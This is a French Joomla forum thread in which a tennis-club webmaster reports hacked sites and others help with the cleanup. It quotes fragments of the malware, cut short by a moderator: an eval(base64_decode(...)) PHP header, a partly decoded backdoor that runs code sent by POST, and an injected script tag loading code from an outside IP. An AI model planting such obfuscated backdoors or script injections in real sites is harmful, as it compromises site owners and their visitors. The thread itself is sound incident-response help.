Hacking de mes sites Joomla

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Hacking de mes sites Joomla

    Bonjour a tous!

    Voila mon problème, ce matin je me connecte comme tous les matins sur le site web de mon tennis club afin de réfléchir à : Qu'est ce que je pourrai améliorer aujourd'hui!
    Sauf que ce matin, j'ai eu droit à une erreur php!
    Je me suis rendu au fichier en question, et je me suis apercu d'un "truc" bizarre en entete du fichier :

    <?php eval(base64_decode('aWYoIWZ1b
    [MODO] quelques gouttes suffisent [/MODO]
    QT1NUWydlJ10pKTs=')); ?>
    Au départ je n'y est pas trop porté attention, jusqu'à ce que je remarque que les fichiers "configuration.php", "index.php" et "index2.php"ont été modifiés récement!
    Je les télécharges, et je m'arperçois qu'ils ont exactement le meme code en tete de page....
    J'héberge sur mon serveur plusieur site Joomla, tous ont été touchés!

    Pour l'instant je récupere chaque fichier et supprime ce code....
    Mais vu le nombre de fichiers Joomla, je suis sur qu'il y en a plus que ça qui sont touchés...

    Je voudrais savoir si vous avez entendu parlé/rencontré ce probleme et avez vous une idée pour le résoudre?

    Je vous remercie d'avance!

    Mika

  • #2
    bonsoir

    ben là ya pas grand chose à résoudre encodé base 64 , et voilà ce qu'il veut dire une fois décodé:

    Code:
    if(!function_exists('mt2ye')){function mt2ye($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a
    [MODO] quelques gouttes suffisent [/MODO]
    decode($_POST['e']));
    puis dans ce code il est également encodé cette partie

    Code:
    $s=str_replace($a=base64_decode('PHNjcmlwdC
    [MODO] quelques gouttes suffisent [/MODO]
    jcmlwdD4='),'',$s);
    qui veut dire :

    Code:
    $s=str_replace($a=
    '<script src=http://89.189.
    [MODO] quelques gouttes suffisent [/MODO]
    31.php ></script>','',$s);
    donc en gros c'est grace à ce code malicieux qu'il a été possible de réécrire tes fichiers et passer outre toutes formes de sécurité >>

    en sommes une faille a été très bien exploitée , reste à savoir si elle est de niveau noyau serveur ou des fichiers de configuration serveur ou du site (.htaccess pas bien configuré) ou les accès FTP cassés !

    dans tous les cas ce code permet de maintenir par la fonction mt2ye le contrôle !!

    pas bon , pas bon !! conseil :

    1/Tout supprimer (à moins que tu veuilles chercher sur tout le site toutes traces de plantage de code malicieux et là si t'as pas les bons outils c'est peine perdue)
    2/ changer tous tes pass (base et FTP)
    3/ remettre un backup (base et fichiers)

    fin ...
    Dernière édition par Thorhax à 05/12/2009, 00h08
    adaptations|conceptions

    Commentaire


    • #3
      Merci beaucoup pour cette réponse très détaillé Thorhax!

      En ayant fait le tour sur le forum, j'ai vu les modifications nécessaire du htaccess pour avoir une meilleure sécurité!
      J'ai donc fait ces changements il y a 5 jours, j'ai aussi remplacé un bon nombre de fichiers infectés...
      Outre les fichiers Index.php, Index2.php et configuration.php, tous les fichiers Index.html ont été infectés également par ce type de code là :
      <script src=http://89.189.
      [MODO] quelques gouttes suffisent [/MODO]
      31.php ></script>
      Comme tu l'as décrit justement dans ton message.
      Je me suis aperçu également que dans chaque dossier images (à n'importe quel niveau), se trouvait un fichier gifimg.php avec ce code là :
      base64_decode('PHNjcml
      [MODO] quelques gouttes suffisent [/MODO]
      mlwdD4')
      J'ai donc :
      - Changé un bon nombre de fichiers infectés, remplacé un maximum de fichier.html et remplacé les fichiers gifimg.php avec un code vierge à l'intérieur.
      - Changé mon mot de passe FTP.
      - Modifié le htaccess.
      - Supprimé tous les répertoires inutiles.

      En général, si je supprimait le code d'un fichier, celui ci revenait dès le lendemain, mais là depuis mes modifications ça fait 5 jours que rien n'a été modifié!
      Je me doute bien que tout n'est pas réparé et qu'il n'y aura plus de problèmes, je reste en garde d'ailleurs, mais quoi qu'il en soit, pour l'instant je n'ai plus de soucis, et j'espère que ça va continuer ainsi.

      PS: mon site principal possède un forum phpbb, qui lui aussi a été infecté, il se peut que la faille vienne du forum car j'ai lu pas mal d'articles sur la sécurité des forums phpbb (mais après l'avoir installé évidemment).

      En tout cas, merci encore pour ta réponse

      Cheers

      Commentaire


      • #4
        Bonjour,
        regarde aussi ton poste de travail ce type d'attaque arrive le plus souvent simplement par ton FTP cf :
        http://forum.joomla.fr/showthread.php?t=93833
        http://forum.joomla.fr/showthread.php?t=95383
        http://forum.joomla.fr/showthread.php?t=95156
        http://forum.joomla.fr/showthread.php?t=95673
        etc...
        Schtroumpfe toi le Schtroumpf t'aidera.
        Je ne schtroumpfe pas aux demandes de schtroumpf par MP.

        Commentaire


        • #5
          Hello Mika,
          On a développé une extension qui permet de controller régulièrement la taille de certains fichiers clés de Joomla! et de t'avertir en cas de changement.
          http://forge.joomla.org/gf/project/jmonitoring/
          Bonne journée
          PA
          watchful Contrôle, backup, mise à jour et surveillance de vos sites joomla: http://www.watchful.li
          inetis Création et intégration professionnelles sous Joomla : http://www.inetis.ch

          Commentaire

          Annonce

          Réduire
          1 sur 2 < >

          C'est [Réglé] et on n'en parle plus ?

          A quoi ça sert ?
          La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

          Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

          Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
          Comment ajouter la mention [Réglé] à votre discussion ?
          1 - Aller sur votre discussion et éditer votre premier message :


          2 - Cliquer sur la liste déroulante Préfixe.

          3 - Choisir le préfixe [Réglé].


          4 - Et voilà… votre discussion est désormais identifiée comme réglée.

          2 sur 2 < >

          Assistance au forum - Outil de publication d'infos de votre site

          Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

          Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

          Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

          UTILISER À VOS PROPRES RISQUES :
          L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

          Problèmes connus :
          FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

          Installation :

          1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

          Archive zip : https://github.com/AFUJ/FPA/zipball/master

          2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

          3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

          4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

          5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

          6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
          et remplacer www. votresite .com par votre nom de domaine


          Exemples:
          Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
          Télécharger le script fpa-fr.php dans: /public_html/
          Pour executer le script: http://www..com/fpa-fr.php

          Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
          Télécharger le script fpa-fr.php dans: /public_html/cms/
          Pour executer le script: http://www..com/cms/fpa-fr.php

          En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

          Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
          Voir plus
          Voir moins
          Travaille ...
          X